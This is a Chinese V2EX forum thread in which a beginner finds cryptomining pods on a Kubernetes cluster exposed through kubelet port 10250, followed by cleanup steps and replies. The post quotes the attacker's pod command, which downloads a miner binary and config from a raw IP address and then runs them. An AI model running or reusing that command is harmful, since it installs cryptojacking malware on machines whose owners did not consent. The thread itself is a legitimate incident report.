k8s 被人拿去挖矿了

2018-08-02 18:36:54 +08:00
 shisang

在腾讯云学生机上自己折腾 k8s,并把 blog 部署在上边,结果两天上去怎么多那么多 pod。

top

kubectl get pods

ps aux | grep k.conf

查看 /tmp/docker, 没有了估计是屁股被擦干净了。

订阅轻重一个 pod

Command:
      sh
      -c
      curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json

找到了一篇一样遭遇的文章http://www.lijiaocn.com/%E9%97%AE%E9%A2%98/2018/07/20/kubernetes-docker-cpu-high.html 按照作者所说应该是 10250 端口暴露到外网了。

netstat -lnpt | grep 10250 果不其然。

先杀死挖矿 pods,

kubectl get pods | grep y1ee4 | awk '{print $1}' | xargs kubectl delete --grace-period=0 --force pods

kubectl get pods

有重新创建了,日了

kubectl get rc 然后 delete rc,赶紧查看是不是哪里配置写错了。

新手,大神路过指导一二。

6489 次点击
所在节点    问与答
24 条回复
znood
2018-08-03 13:07:47 +08:00
查看 k8s 所有资源,把可疑的删掉,只删 pod 没用的,kubelet 会自动创建
shisang
2018-08-03 14:51:49 +08:00
@580a388da131 为了方便测试,安全之前设置为 all,所有端口放行了~~
shisang
2018-08-03 18:04:03 +08:00
@E1n 现在下岗,没钱~!
suom
2019-06-28 00:39:42 +08:00
装好机器以后,整个机器备份一次。
被黑了,直接查洞-还原备份-修补漏洞-再次备份-部署业务

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/476377

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX